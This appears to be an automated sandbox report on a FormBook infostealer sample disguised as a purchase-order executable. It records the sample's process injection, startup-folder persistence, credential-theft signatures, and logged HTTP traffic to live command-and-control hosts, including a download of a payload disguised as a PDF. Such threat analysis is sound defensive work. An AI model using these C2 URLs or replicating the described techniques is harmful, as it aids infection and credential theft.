
Windows Analysis Report
P.Order request for quotations.exe

Overview

General Information

Sample name: P.Order request for quotations.exe
Analysis ID: 1634999
MD5: 97184d87ca001b04d2bde0ee754f3fb1
SHA1: 45189e8fd1f403d8d5f901d78c27c2aaaaa247f5
SHA256: b907a6a075b32404a73555236511926abfcdc49adb1f83033ada0b6cde886b83
Tags: exe, Formbook, user-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Downloads files with wrong headers with respect to MIME Content-Type
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • P.Order request for quotations.exe (PID: 7152 cmdline: "C:\Users\user\Desktop\P.Order request for quotations.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
    • P.Order request for quotations.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\P.Order request for quotations.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
      • Q1o6bM9jrUC5ov0.exe (PID: 5728 cmdline: "C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\oS5uO5pk.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • finger.exe (PID: 6960 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • firefox.exe (PID: 6116 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 3612 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HashSize.exe (PID: 660 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
      • HashSize.exe (PID: 6884 cmdline: "C:\Users\user\AppData\Roaming\HashSize.exe" MD5: 97184D87CA001B04D2BDE0EE754F3FB1)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000000.00000002.1048159785.0000000005F80000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
2.2.P.Order request for quotations.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.P.Order request for quotations.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
7.2.HashSize.exe.38a0a04.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
0.2.P.Order request for quotations.exe.5f80000.4.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
7.2.HashSize.exe.38a0a04.3.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

                      System Summary

                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 3612, ProcessName: wscript.exe
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs" , ProcessId: 3612, ProcessName: wscript.exe

                      Data Obfuscation

                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\P.Order request for quotations.exe, ProcessId: 7152, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs

                      AV Detection

                      Source: P.Order request for quotations.exeAvira: detected
                      Source: http://www.blogkart4u.xyz/36cg/?vVgx8nB0=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqigWvF+W/duDuE7nAcq/mnuhXg7Y1Cc7r91JMMuzgajzb2w==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/Avira URL Cloud: Label: malware
                      Source: http://www.warc.tech/hxn2/Avira URL Cloud: Label: malware
                      Source: http://www.quo1ybjmkhdqljoz.top/ynw5/Avira URL Cloud: Label: malware
                      Source: http://www.warc.tech/hxn2/?vVgx8nB0=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FUlJM8pp5ZWnyQzjiEF0o+8f3DTsNGzDCqAFXqps7Otorhw==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.quo1ybjmkhdqljoz.top/ynw5/?vVgx8nB0=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+1kOCv+QPJBPSYWlpE+7rJT4XimcIjMNVjm2BzIrdTYhFEQ==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.2y0uoqwoohvdf5vd.top/qkhv/?vVgx8nB0=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaz3FYy7ZtcWTJr5uThofgj61z5iUNO0ndKyizlBAbSXj3dvw==&lX=uP8XAvira URL Cloud: Label: malware
                      Source: http://www.blogkart4u.xyz/36cg/Avira URL Cloud: Label: malware
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeAvira: detection malicious, Label: HEUR/AGEN.1323672
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeReversingLabs: Detection: 26%
                      Source: P.Order request for quotations.exeVirustotal: Detection: 36%
                      Source: P.Order request for quotations.exeReversingLabs: Detection: 26%
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: P.Order request for quotations.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: P.Order request for quotations.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: finger.pdb source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: P.Order request for quotations.exe, P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3360028021.0000000000A3F000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: finger.pdbGCTL source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0032CB70 FindFirstFileW,FindNextFileW,FindClose,5_2_0032CB70
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 4x nop then jmp 066971A8h0_2_066970E8
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 4x nop then jmp 066971A8h0_2_066970F0
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then pop edi4_2_063EB738
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then pop edi4_2_063EAC9F
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then xor eax, eax4_2_063F0525
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeCode function: 4x nop then pop edi4_2_063EB8DA
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax5_2_00319E40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi5_2_0031E6E6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h5_2_02B904CE

                      Networking

                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56932 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56937 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56928 -> 172.67.138.55:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56945 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56942 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56946 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56933 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56947 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56940 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56931 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56939 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56944 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56949 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56938 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56956 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56950 -> 209.74.77.230:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56959 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56935 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56951 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56953 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56955 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56934 -> 43.251.56.78:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56958 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56943 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56936 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56957 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56969 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56967 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56977 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56980 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56979 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56975 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56971 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56961 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56954 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56974 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56962 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56963 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56965 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56964 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56978 -> 8.222.228.107:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56966 -> 111.119.219.195:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56941 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56973 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56952 -> 134.122.135.54:80
                      Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:56976 -> 157.112.187.77:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56960 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56968 -> 172.67.148.163:80
                      Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:56948 -> 209.74.77.230:80
                      Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:09:49 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 10 Mar 2025 23:02:55 GMT ETag: "13b810-63004f8f5c1bc" Accept-Ranges: bytes Content-Length: 1292304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf
                      Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 08:10:13 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Mon, 10 Mar 2025 23:02:55 GMT ETag: "13b810-63004f8f5c1bc" Accept-Ranges: bytes Content-Length: 1292304 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf
                      Source: DNS query: www.lenzor.xyz
                      Source: DNS query: www.031233720.xyz
                      Source: DNS query: www.dualbitcoin.xyz
                      Source: DNS query: www.ethereumkeeper.xyz
                      Source: DNS query: www.moonavatar.xyz
                      Source: DNS query: www.blogkart4u.xyz
                      Source: DNS query: www.splogi.xyz
                      Source: global trafficTCP traffic: 192.168.2.8:56923 -> 162.159.36.2:53
                      Source: global trafficHTTP traffic detected: GET /win32/panel/uploads/Gdugwwjztt.pdf HTTP/1.1Host: 196.251.83.222Connection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 8.222.228.107 8.222.228.107
                      Source: Joe Sandbox ViewIP Address: 157.112.187.77 157.112.187.77
                      Source: unknownTCP traffic detected without corresponding DNS query: 196.251.83.222
                      Source: global trafficHTTP traffic detected: GET /0pv3/?lX=uP8X&vVgx8nB0=I6G8DBRKF3PN9Cy5HjggG2ycZCNyM0JG3kSPGuvbR5esC8dJu2EfwhpJJLd7FYxSNzCiq9OPGq3cAsVzLwaIAq+rDUC7Ws6F1E/QRL3HoNlolI9QSKQE0mSGSrcLWdFvRw== HTTP/1.1Host: www.crosspatches.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ynw5/?vVgx8nB0=ZF/ThatktxT4IEpwfKsUOyQVHh5nHqomFNyY5ir4FklXSfOpwm6EfqJ4jyoelDA7A+pvc8dOI9DtdfL88IP+1kOCv+QPJBPSYWlpE+7rJT4XimcIjMNVjm2BzIrdTYhFEQ==&lX=uP8X HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pknc/?vVgx8nB0=TsWT+PVJyweInpctzthQVdxTMr7Q3Mb2cuEH07dFoI07yBLnimF2DBYyoUH276N8oHesXX9azD5G5u0ynw8eGFj9tum9xXwIQ0i8jcSREbVxD3yrlD8BVP9rS1PvZDB20g==&lX=uP8X HTTP/1.1Host: www.lenzor.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hxn2/?vVgx8nB0=ZV/imptMlgE5kVt692kkoOOnpYQNqGQCFmm/TGgbqnHG1mgu4lPPJ2KHb3Eys5m88oXnT1AcDhAihVQlrO8FUlJM8pp5ZWnyQzjiEF0o+8f3DTsNGzDCqAFXqps7Otorhw==&lX=uP8X HTTP/1.1Host: www.warc.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qxo2/?vVgx8nB0=o8DmqPI+VqVvnj/lu1ZpZtXdZr7bSrN2dVm8WOSQKn+kpW+rBJORjMlPia6OnGwbOFqdqYTBcx/hOJb3c+NaqPX0LJkVfisaYNtVIumZsa/w93UM+1/1xwWXjFPUQFIIoA==&lX=uP8X HTTP/1.1Host: www.dualbitcoin.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
